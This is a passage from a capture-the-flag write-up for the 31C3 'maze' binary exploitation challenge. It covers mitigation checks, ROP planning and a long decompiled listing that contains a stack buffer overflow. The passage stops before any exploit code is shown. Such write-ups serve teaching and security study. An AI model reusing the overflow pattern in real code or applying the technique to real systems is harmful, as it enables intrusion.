{"id":28,"date":"2015-09-11T09:22:41","date_gmt":"2015-09-11T09:22:41","guid":{"rendered":"http:\/\/piratesecurityblog.com\/?p=28"},"modified":"2016-09-28T10:07:18","modified_gmt":"2016-09-28T10:07:18","slug":"31c3-ctf-maze-write-up","status":"publish","type":"post","link":"https:\/\/piratesecurityblog.com\/?p=28","title":{"rendered":"31C3 CTF: Maze write-up"},"content":{"rendered":"

This is my write-up for the maze challenge in the 31C3 CTF, that I played with the Hacking For Soju team. We \u201conly\u201d got 10th place (out of the 286 teams that scored any points at all), but considering that only me, capsl and avlidienbrunn had time to spend any time on it (and I was able to score 170 out of our 340 points, which would have given me the #33 spot if I had played alone), it wasn\u2019t too shabby! \ud83d\ude42 If I hadn\u2019t been so sleepy\/off during large parts of the CTF, I would probably have been able to score a bit more. Greets to capsl for brainstorming about the potential ROP-scenarios btw!<\/p>\n

To make this write-up more useful for people that want to learn, I have tried to make it quite detailed.<\/p>\n

The information for the challenge was:<\/p>\n

\n
<\/div>\n
\n\n\n\n
\n
\n
1<\/div>\n
2<\/div>\n
3<\/div>\n
4<\/div>\n
5<\/div>\n<\/div>\n<\/td>\n
\n
\n
Where do you want to go (today)?<\/div>\n
<\/div>\n
nc 188.40.18.71 1234<\/div>\n
<\/div>\n
maze_6a865c7769f331be0666c5c7dccbba9b.tar.gz<\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<\/div>\n

The provided tar.gz file contained the binary for the challenge: maze<\/a><\/p>\n

To run it as a server process on your own system, you can use the following command:<\/p>\n

\n
<\/div>\n
\n\n\n\n
\n
\n
1<\/div>\n<\/div>\n<\/td>\n
\n
\n
socat <\/span>tcp<\/span>–<\/span>listen<\/span>:<\/span>1234<\/span>,<\/span>reuseaddr<\/span>,<\/span>fork <\/span>exec<\/span>:<\/span>.<\/span>\/<\/span>maze<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<\/div>\n

When connecting to the target, the following message is displayed:<\/p>\n

\n
<\/div>\n
\n\n\n\n
\n
\n
1<\/div>\n
2<\/div>\n<\/div>\n<\/td>\n
\n
\n
You wake up and have a big headache.<\/div>\n
You are in a dead end, you can only go east. Where do you want to go (today)?<\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<\/div>\n

Since the name of the challenge is \u201cmaze\u201d, and we are presented with a message that states that we can only go east, the valid inputs are presumably east, west, north and south, and we are supposed to navigate through a maze in order to eventually reach some sort of goal. In order to understand exactly what is going on, and to see if there are any vulnerabilities that we can exploit along the way, our next step is to load the binary in IDA Pro and analyze the code. But first, let\u2019s see what kind of protections are enabled for the binary in question, using checksec.sh<\/a>.<\/p>\n

\n
<\/div>\n
\n\n\n\n
\n
\n
1<\/div>\n
2<\/div>\n
3<\/div>\n<\/div>\n<\/td>\n
\n
\n
je<\/span>@<\/span>tiny<\/span>:<\/span>~<\/span>\/<\/span>31c3<\/span>\/<\/span>pwn<\/span>\/<\/span>maze<\/span>\/<\/span>je<\/span>$<\/span> checksec<\/span>.<\/span>sh<\/span> —<\/span>file <\/span>maze<\/span><\/div>\n
RELRO\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span>STACK <\/span>CANARY\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>NX\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>PIE\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span>RPATH\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>RUNPATH\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>FILE<\/span><\/div>\n
Partial <\/span>RELRO\u00a0\u00a0 <\/span>No <\/span>canary <\/span>found\u00a0\u00a0 <\/span>NX <\/span>enabled\u00a0\u00a0\u00a0\u00a0<\/span>No <\/span>PIE\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>No <\/span>RPATH\u00a0\u00a0 <\/span>No <\/span>RUNPATH\u00a0\u00a0 <\/span>maze<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<\/div>\n

I would suggest that you make a habit of checking which exploit mitigations have been enabled for your target before you start auditing it. For real-world targets, this will give you an idea of the preconditions you will probably have to meet in order to achieve reliable exploitation of the target (i.e. if information leaks are necessary, and so on). For CTF challenges, it can even provide hints on what kind of vulnerabilities to look for.<\/p>\n

In this case, NX is enabled, so we will probably have to use a ROP based payload. PIE (Position-Independent Executable) is not enabled, so we will be able to use ROP gadgets from the executable itself even if ASLR is enabled on the target system. However, the binary is rather small, so there is probably only a limited number of suitable ROP gadgets available. Stack canaries are not enabled, which is a strong indication that the vulnerability to look out for in this case is probably a stack-based buffer overflow.<\/p>\n

Do not rely completely on the information you determine this way though. In some cases (i.e, a poorly organized CTF), the binary running on the actual target is slightly different than the one provided, or some protections have been explicitly disabled\/enabled on the target system.<\/p>\n

Also note that the binary is a 64-bit Linux executable. Analyzing 64-bit (x86_64, to be specific) code has recently become a lot less time consuming, due to the release of Hex-Rays x64. Hex-Rays is an excellent decompiler plugin for IDA Pro, that lets you interactively work with the decompiled code in order to make sense of it. Note that there are still corner-cases that Hex-Rays is not able to handle, especially when dealing with obfuscated code and code that has been explicitly designed in order to make static analysis difficult. If you find something strange in the decompiled code, always perform manual analysis of the assembly code in question.<\/p>\n

After the initial pass through the Hex-Rays decompiler, the code shown below is produced (note that irrelevant code, i.e the automatically inserted stub that is calling __libc_start_main() and the code handling initialization and cleanup, has been manually removed from the source code listing). While reading it, try to see if you can spot the vulnerability:<\/p>\n

\n
<\/div>\n
\n\n\n\n
\n
\n
1<\/div>\n
2<\/div>\n
3<\/div>\n
4<\/div>\n
5<\/div>\n
6<\/div>\n
7<\/div>\n
8<\/div>\n
9<\/div>\n
10<\/div>\n
11<\/div>\n
12<\/div>\n
13<\/div>\n
14<\/div>\n
15<\/div>\n
16<\/div>\n
17<\/div>\n
18<\/div>\n
19<\/div>\n
20<\/div>\n
21<\/div>\n
22<\/div>\n
23<\/div>\n
24<\/div>\n
25<\/div>\n
26<\/div>\n
27<\/div>\n
28<\/div>\n
29<\/div>\n
30<\/div>\n
31<\/div>\n
32<\/div>\n
33<\/div>\n
34<\/div>\n
35<\/div>\n
36<\/div>\n
37<\/div>\n
38<\/div>\n
39<\/div>\n
40<\/div>\n
41<\/div>\n
42<\/div>\n
43<\/div>\n
44<\/div>\n
45<\/div>\n
46<\/div>\n
47<\/div>\n
48<\/div>\n
49<\/div>\n
50<\/div>\n
51<\/div>\n
52<\/div>\n
53<\/div>\n
54<\/div>\n
55<\/div>\n
56<\/div>\n
57<\/div>\n
58<\/div>\n
59<\/div>\n
60<\/div>\n
61<\/div>\n
62<\/div>\n
63<\/div>\n
64<\/div>\n
65<\/div>\n
66<\/div>\n
67<\/div>\n
68<\/div>\n
69<\/div>\n
70<\/div>\n
71<\/div>\n
72<\/div>\n
73<\/div>\n
74<\/div>\n
75<\/div>\n
76<\/div>\n
77<\/div>\n
78<\/div>\n
79<\/div>\n
80<\/div>\n
81<\/div>\n
82<\/div>\n
83<\/div>\n
84<\/div>\n
85<\/div>\n
86<\/div>\n
87<\/div>\n
88<\/div>\n
89<\/div>\n
90<\/div>\n
91<\/div>\n
92<\/div>\n
93<\/div>\n
94<\/div>\n
95<\/div>\n
96<\/div>\n
97<\/div>\n
98<\/div>\n
99<\/div>\n
100<\/div>\n
101<\/div>\n
102<\/div>\n
103<\/div>\n
104<\/div>\n
105<\/div>\n
106<\/div>\n
107<\/div>\n
108<\/div>\n
109<\/div>\n
110<\/div>\n
111<\/div>\n
112<\/div>\n
113<\/div>\n
114<\/div>\n
115<\/div>\n
116<\/div>\n
117<\/div>\n
118<\/div>\n
119<\/div>\n
120<\/div>\n
121<\/div>\n
122<\/div>\n
123<\/div>\n
124<\/div>\n
125<\/div>\n
126<\/div>\n
127<\/div>\n
128<\/div>\n
129<\/div>\n
130<\/div>\n
131<\/div>\n
132<\/div>\n
133<\/div>\n
134<\/div>\n
135<\/div>\n
136<\/div>\n
137<\/div>\n
138<\/div>\n
139<\/div>\n
140<\/div>\n
141<\/div>\n
142<\/div>\n
143<\/div>\n
144<\/div>\n
145<\/div>\n
146<\/div>\n
147<\/div>\n
148<\/div>\n
149<\/div>\n
150<\/div>\n
151<\/div>\n
152<\/div>\n
153<\/div>\n
154<\/div>\n
155<\/div>\n
156<\/div>\n
157<\/div>\n
158<\/div>\n
159<\/div>\n
160<\/div>\n
161<\/div>\n
162<\/div>\n
163<\/div>\n
164<\/div>\n
165<\/div>\n
166<\/div>\n
167<\/div>\n
168<\/div>\n
169<\/div>\n
170<\/div>\n
171<\/div>\n
172<\/div>\n
173<\/div>\n
174<\/div>\n
175<\/div>\n
176<\/div>\n
177<\/div>\n
178<\/div>\n
179<\/div>\n
180<\/div>\n
181<\/div>\n
182<\/div>\n
183<\/div>\n
184<\/div>\n
185<\/div>\n
186<\/div>\n
187<\/div>\n
188<\/div>\n
189<\/div>\n
190<\/div>\n
191<\/div>\n
192<\/div>\n
193<\/div>\n
194<\/div>\n
195<\/div>\n
196<\/div>\n
197<\/div>\n
198<\/div>\n
199<\/div>\n
200<\/div>\n
201<\/div>\n
202<\/div>\n
203<\/div>\n
204<\/div>\n
205<\/div>\n
206<\/div>\n
207<\/div>\n<\/div>\n<\/td>\n
\n
\n
\/\/————————————————————————-<\/span><\/div>\n
\/\/ Function declarations<\/span><\/div>\n
<\/div>\n
__int64 <\/span>__fastcall <\/span>main<\/span>(<\/span>__int64 <\/span>a1<\/span>,<\/span> char<\/span> *<\/span>*<\/span>a2<\/span>,<\/span> char<\/span> *<\/span>*<\/span>a3<\/span>)<\/span>;<\/span><\/div>\n
int<\/span> __fastcall <\/span>sub_400CE0<\/span>(<\/span>unsigned<\/span> int<\/span> a1<\/span>)<\/span>;<\/span><\/div>\n
int<\/span> __fastcall <\/span>sub_400DD0<\/span>(<\/span>unsigned<\/span> int<\/span> a1<\/span>)<\/span>;<\/span><\/div>\n
<\/div>\n
\/\/————————————————————————-<\/span><\/div>\n
\/\/ Data declarations<\/span><\/div>\n
<\/div>\n
_UNKNOWN <\/span>unk_4013E0<\/span>;<\/span> \/\/ weak<\/span><\/div>\n
_UNKNOWN <\/span>unk_40575C<\/span>;<\/span> \/\/ weak<\/span><\/div>\n
char<\/span> *<\/span>off_6060C0<\/span> =<\/span> “You are trapped.”<\/span>;<\/span> \/\/ weak<\/span><\/div>\n
char<\/span> *<\/span>s1<\/span> =<\/span> “west”<\/span>;<\/span> \/\/ idb<\/span><\/div>\n
char<\/span> *<\/span>off_606148<\/span> =<\/span> “north”<\/span>;<\/span> \/\/ idb<\/span><\/div>\n
char<\/span> *<\/span>off_606150<\/span> =<\/span> “east”<\/span>;<\/span> \/\/ idb<\/span><\/div>\n
char<\/span> *<\/span>off_606158<\/span> =<\/span> “south”<\/span>;<\/span> \/\/ idb<\/span><\/div>\n
__int16 <\/span>word_606171<\/span>;<\/span> \/\/ weak<\/span><\/div>\n
<\/div>\n
\/\/—– (00000000004008E0) —————————————————-<\/span><\/div>\n
__int64 <\/span>__fastcall <\/span>main<\/span>(<\/span>__int64 <\/span>a1<\/span>,<\/span> char<\/span> *<\/span>*<\/span>a2<\/span>,<\/span> char<\/span> *<\/span>*<\/span>a3<\/span>)<\/span><\/div>\n
{<\/span><\/div>\n
\u00a0\u00a0<\/span>__int16 <\/span>v3<\/span>;<\/span> \/\/ di@2<\/span><\/div>\n
\u00a0\u00a0<\/span>_WORD *<\/span>v4<\/span>;<\/span> \/\/ rsi@2<\/span><\/div>\n
\u00a0\u00a0<\/span>unsigned<\/span> int<\/span> v5<\/span>;<\/span> \/\/ er14@2<\/span><\/div>\n
\u00a0\u00a0<\/span>int<\/span> v6<\/span>;<\/span> \/\/ ecx@2<\/span><\/div>\n
\u00a0\u00a0<\/span>_UNKNOWN *<\/span>v7<\/span>;<\/span> \/\/ rax@3<\/span><\/div>\n
\u00a0\u00a0<\/span>char<\/span> *<\/span>v8<\/span>;<\/span> \/\/ rdx@7<\/span><\/div>\n
\u00a0\u00a0<\/span>int<\/span> v9<\/span>;<\/span> \/\/ er12@7<\/span><\/div>\n
\u00a0\u00a0<\/span>int<\/span> v10<\/span>;<\/span> \/\/ er13@7<\/span><\/div>\n
\u00a0\u00a0<\/span>int<\/span> v11<\/span>;<\/span> \/\/ er15@7<\/span><\/div>\n
\u00a0\u00a0<\/span>int<\/span> v12<\/span>;<\/span> \/\/ er14@7<\/span><\/div>\n
\u00a0\u00a0<\/span>char<\/span> *<\/span>v13<\/span>;<\/span> \/\/ rbx@8<\/span><\/div>\n
\u00a0\u00a0<\/span>char<\/span> *<\/span>v14<\/span>;<\/span> \/\/ rbx@10<\/span><\/div>\n
\u00a0\u00a0<\/span>signed<\/span> int<\/span> v16<\/span>;<\/span> \/\/ eax@21<\/span><\/div>\n
\u00a0\u00a0<\/span>signed<\/span> int<\/span> v17<\/span>;<\/span> \/\/ er12@23<\/span><\/div>\n
\u00a0\u00a0<\/span>unsigned<\/span> int<\/span> v18<\/span>;<\/span> \/\/ [sp+Ch] [bp-64h]@1<\/span><\/div>\n
\u00a0\u00a0<\/span>__int16 <\/span>v19<\/span>[<\/span>8<\/span>]<\/span>;<\/span> \/\/ [sp+10h] [bp-60h]@2<\/span><\/div>\n
\u00a0\u00a0<\/span>char<\/span> *<\/span>s<\/span>;<\/span> \/\/ [sp+20h] [bp-50h]@8<\/span><\/div>\n
\u00a0\u00a0<\/span>size<\/span>_<\/span>t n<\/span>;<\/span> \/\/ [sp+30h] [bp-40h]@19<\/span><\/div>\n
<\/div>\n
\u00a0\u00a0<\/span>setbuf<\/span>(<\/span>stdin<\/span>,<\/span> 0LL<\/span>)<\/span>;<\/span><\/div>\n
\u00a0\u00a0<\/span>setbuf<\/span>(<\/span>stdout<\/span>,<\/span> 0LL<\/span>)<\/span>;<\/span><\/div>\n
\u00a0\u00a0<\/span>word_606171<\/span> =<\/span> 257<\/span>;<\/span><\/div>\n
\u00a0\u00a0<\/span>puts<\/span>(<\/span>“You wake up and have a big headache.”<\/span>)<\/span>;<\/span><\/div>\n
\u00a0\u00a0<\/span>v18<\/span> =<\/span> 0<\/span>;<\/span><\/div>\n
LABEL_2<\/span>:<\/span><\/div>\n
\u00a0\u00a0<\/span>v3<\/span> =<\/span> word_606171<\/span>;<\/span><\/div>\n
\u00a0\u00a0<\/span>v4<\/span> =<\/span> v19<\/span>;<\/span><\/div>\n
\u00a0\u00a0<\/span>v5<\/span> =<\/span> 0<\/span>;<\/span><\/div>\n
\u00a0\u00a0<\/span>v6<\/span> =<\/span> 0<\/span>;<\/span><\/div>\n
LABEL_3<\/span>:<\/span><\/div>\n
\u00a0\u00a0<\/span>while<\/span> (<\/span> 2<\/span> )<\/span><\/div>\n
\u00a0\u00a0<\/span>{<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0<\/span>*<\/span>v4<\/span> =<\/span> v3<\/span>;<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0<\/span>*<\/span>(<\/span>(<\/span>_BYTE *<\/span>)<\/span>v4<\/span> +<\/span> (<\/span>v6<\/span> &<\/span> 1<\/span>)<\/span>)<\/span> +=<\/span> (<\/span>v6<\/span> &<\/span> 2<\/span>)<\/span> –<\/span> 1<\/span>;<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0<\/span>++<\/span>v4<\/span>;<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0<\/span>v7<\/span> =<\/span> &<\/span>unk_4013E0<\/span>;<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0<\/span>do<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0<\/span>{<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>if<\/span> (<\/span> *<\/span>(<\/span>v4<\/span> –<\/span> 1<\/span>)<\/span> ==<\/span> *<\/span>(<\/span>_WORD *<\/span>)<\/span>v7<\/span> )<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>{<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>if<\/span> (<\/span> ++<\/span>v6<\/span> !=<\/span> 4<\/span> )<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>goto<\/span> LABEL_3<\/span>;<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>goto<\/span> LABEL_7<\/span>;<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>}<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>v7<\/span> =<\/span> (<\/span>_UNKNOWN *<\/span>)<\/span>(<\/span>(<\/span>char<\/span> *<\/span>)<\/span>v7<\/span> +<\/span> 2<\/span>)<\/span>;<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0<\/span>}<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0<\/span>while<\/span> (<\/span> v7<\/span> !=<\/span> &<\/span>unk<\/span>_<\/span>40575C )<\/span>;<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0<\/span>v16<\/span> =<\/span> 1<\/span> <<<\/span> v6<\/span>++<\/span>;<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0<\/span>v5<\/span> |=<\/span> v16<\/span>;<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0<\/span>if<\/span> (<\/span> v6<\/span> !=<\/span> 4<\/span> )<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>continue<\/span>;<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0<\/span>break<\/span>;<\/span><\/div>\n
\u00a0\u00a0<\/span>}<\/span><\/div>\n
LABEL_7<\/span>:<\/span><\/div>\n
\u00a0\u00a0<\/span>v8<\/span> =<\/span> (<\/span>&<\/span>off_6060C0<\/span>)<\/span>[<\/span>8<\/span> *<\/span> v5<\/span>]<\/span>;<\/span><\/div>\n
\u00a0\u00a0<\/span>v9<\/span> =<\/span> v5<\/span> &<\/span> 1<\/span>;<\/span><\/div>\n
\u00a0\u00a0<\/span>v10<\/span> =<\/span> v5<\/span> &<\/span> 2<\/span>;<\/span><\/div>\n
\u00a0\u00a0<\/span>v11<\/span> =<\/span> v5<\/span> &<\/span> 4<\/span>;<\/span><\/div>\n
\u00a0\u00a0<\/span>v12<\/span> =<\/span> v5<\/span> &<\/span> 8<\/span>;<\/span><\/div>\n
\u00a0\u00a0<\/span>__printf_chk<\/span>(<\/span>1LL<\/span>,<\/span> “%s Where do you want to go (today)? “<\/span>)<\/span>;<\/span><\/div>\n
\u00a0\u00a0<\/span>while<\/span> (<\/span> 1<\/span> )<\/span><\/div>\n
\u00a0\u00a0<\/span>{<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0<\/span>s<\/span> =<\/span> 0LL<\/span>;<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0<\/span>n<\/span> =<\/span> 0LL<\/span>;<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0<\/span>if<\/span> (<\/span> getline<\/span>(<\/span>&<\/span>s<\/span>,<\/span> &<\/span>n<\/span>,<\/span> stdin<\/span>)<\/span> <=<\/span> 0<\/span> )<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>return<\/span> 0LL<\/span>;<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0<\/span>v13<\/span> =<\/span> s<\/span>;<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0<\/span>if<\/span> (<\/span> !<\/span>s<\/span> ||<\/span> !<\/span>*<\/span>s<\/span> )<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>return<\/span> 0LL<\/span>;<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0<\/span>v13<\/span>[<\/span>strlen<\/span>(<\/span>s<\/span>)<\/span> –<\/span> 1<\/span>]<\/span> =<\/span> 0<\/span>;<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0<\/span>v14<\/span> =<\/span> s<\/span>;<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0<\/span>if<\/span> (<\/span> !<\/span>strcasecmp<\/span>(<\/span>s1<\/span>,<\/span> s<\/span>)<\/span> &&<\/span> v9<\/span> )<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0<\/span>{<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>v17<\/span> =<\/span> 0<\/span>;<\/span><\/div>\n
LABEL_24<\/span>:<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>__printf_chk<\/span>(<\/span>1LL<\/span>,<\/span> “You go %s.\\n”<\/span>)<\/span>;<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>free<\/span>(<\/span>s<\/span>)<\/span>;<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>++<\/span>v18<\/span>;<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>word_606171<\/span> =<\/span> v19<\/span>[<\/span>(<\/span>unsigned<\/span> __int64<\/span>)<\/span>(<\/span>unsigned<\/span> int<\/span>)<\/span>v17<\/span>]<\/span>;<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>if<\/span> (<\/span> 23986<\/span> !=<\/span> word<\/span>_<\/span>606171 )<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>goto<\/span> LABEL_2<\/span>;<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>sub_400DD0<\/span>(<\/span>v18<\/span>)<\/span>;<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>return<\/span> 0LL<\/span>;<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0<\/span>}<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0<\/span>if<\/span> (<\/span> !<\/span>strcasecmp<\/span>(<\/span>off_606148<\/span>,<\/span> v14<\/span>)<\/span> &&<\/span> v10<\/span> )<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0<\/span>{<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>v17<\/span> =<\/span> 1<\/span>;<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>goto<\/span> LABEL_24<\/span>;<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0<\/span>}<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0<\/span>if<\/span> (<\/span> !<\/span>strcasecmp<\/span>(<\/span>off_606150<\/span>,<\/span> v14<\/span>)<\/span> &&<\/span> v11<\/span> )<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0<\/span>{<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>v17<\/span> =<\/span> 2<\/span>;<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>goto<\/span> LABEL_24<\/span>;<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0<\/span>}<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0<\/span>if<\/span> (<\/span> !<\/span>strcasecmp<\/span>(<\/span>off_606158<\/span>,<\/span> v14<\/span>)<\/span> &&<\/span> v12<\/span> )<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0<\/span>{<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>v17<\/span> =<\/span> 3<\/span>;<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>goto<\/span> LABEL_24<\/span>;<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0<\/span>}<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0<\/span>__printf_chk<\/span>(<\/span>1LL<\/span>,<\/span> “You can not go %s. Where do you want to go (today)? “<\/span>)<\/span>;<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0<\/span>free<\/span>(<\/span>s<\/span>)<\/span>;<\/span><\/div>\n
\u00a0\u00a0<\/span>}<\/span><\/div>\n
}<\/span><\/div>\n
<\/div>\n
\/\/—– (0000000000400CE0) —————————————————-<\/span><\/div>\n
int<\/span> __fastcall <\/span>sub_400CE0<\/span>(<\/span>unsigned<\/span> int<\/span> a1<\/span>)<\/span><\/div>\n
{<\/span><\/div>\n
\u00a0\u00a0<\/span>ssize_t <\/span>v1<\/span>;<\/span> \/\/ rax@1<\/span><\/div>\n
\u00a0\u00a0<\/span>ssize_t <\/span>v2<\/span>;<\/span> \/\/ rbx@1<\/span><\/div>\n
\u00a0\u00a0<\/span>FILE *<\/span>v3<\/span>;<\/span> \/\/ r13@2<\/span><\/div>\n
\u00a0\u00a0<\/span>char<\/span> ptr<\/span>;<\/span> \/\/ [sp+0h] [bp-420h]@1<\/span><\/div>\n
\u00a0\u00a0<\/span>_BYTE <\/span>v6<\/span>[<\/span>7<\/span>]<\/span>;<\/span> \/\/ [sp+1h] [bp-41Fh]@1<\/span><\/div>\n
\u00a0\u00a0<\/span>char<\/span> v7<\/span>;<\/span> \/\/ [sp+3F8h] [bp-28h]@1<\/span><\/div>\n
<\/div>\n
\u00a0\u00a0<\/span>__printf_chk<\/span>(<\/span>1LL<\/span>,<\/span> “If you want, you can also add your name: “<\/span>)<\/span>;<\/span><\/div>\n
\u00a0\u00a0<\/span>memset<\/span>(<\/span>&<\/span>ptr<\/span>,<\/span> 0<\/span>,<\/span> 0x3F8uLL<\/span>)<\/span>;<\/span><\/div>\n
\u00a0\u00a0<\/span>ptr<\/span> =<\/span> 10<\/span>;<\/span><\/div>\n
\u00a0\u00a0<\/span>v7<\/span> =<\/span> 0<\/span>;<\/span><\/div>\n
\u00a0\u00a0<\/span>v1<\/span> =<\/span> read<\/span>(<\/span>0<\/span>,<\/span> v6<\/span>,<\/span> 0x420uLL<\/span>)<\/span>;<\/span><\/div>\n
\u00a0\u00a0<\/span>v2<\/span> =<\/span> v1<\/span>;<\/span><\/div>\n
\u00a0\u00a0<\/span>if<\/span> (<\/span> v1<\/span> ><\/span> 0<\/span> )<\/span><\/div>\n
\u00a0\u00a0<\/span>{<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0<\/span>v1<\/span> =<\/span> (<\/span>ssize_t<\/span>)<\/span>fopen<\/span>(<\/span>“highscore.txt”<\/span>,<\/span> “a”<\/span>)<\/span>;<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0<\/span>v3<\/span> =<\/span> (<\/span>FILE *<\/span>)<\/span>v1<\/span>;<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0<\/span>if<\/span> (<\/span> v1<\/span> )<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0<\/span>{<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>fwrite<\/span>(<\/span>&<\/span>ptr<\/span>,<\/span> 1uLL<\/span>,<\/span> v2<\/span> +<\/span> 1<\/span>,<\/span> (<\/span>FILE *<\/span>)<\/span>v1<\/span>)<\/span>;<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>LODWORD<\/span>(<\/span>v1<\/span>)<\/span> =<\/span> __sprintf_chk<\/span>(<\/span>&<\/span>ptr<\/span>,<\/span> 1LL<\/span>,<\/span> 1017LL<\/span>,<\/span> ” (%d)”<\/span>,<\/span> a1<\/span>)<\/span>;<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>if<\/span> (<\/span> (<\/span>signed<\/span> int<\/span>)<\/span>v1<\/span> ><\/span> 0<\/span> )<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>{<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>fwrite<\/span>(<\/span>&<\/span>ptr<\/span>,<\/span> 1uLL<\/span>,<\/span> (<\/span>signed<\/span> int<\/span>)<\/span>v1<\/span>,<\/span> v3<\/span>)<\/span>;<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>LODWORD<\/span>(<\/span>v1<\/span>)<\/span> =<\/span> fclose<\/span>(<\/span>v3<\/span>)<\/span>;<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>}<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0<\/span>}<\/span><\/div>\n
\u00a0\u00a0<\/span>}<\/span><\/div>\n
\u00a0\u00a0<\/span>return<\/span> v1<\/span>;<\/span><\/div>\n
}<\/span><\/div>\n
<\/div>\n
\/\/—– (0000000000400DD0) —————————————————-<\/span><\/div>\n
int<\/span> __fastcall <\/span>sub_400DD0<\/span>(<\/span>unsigned<\/span> int<\/span> a1<\/span>)<\/span><\/div>\n
{<\/span><\/div>\n
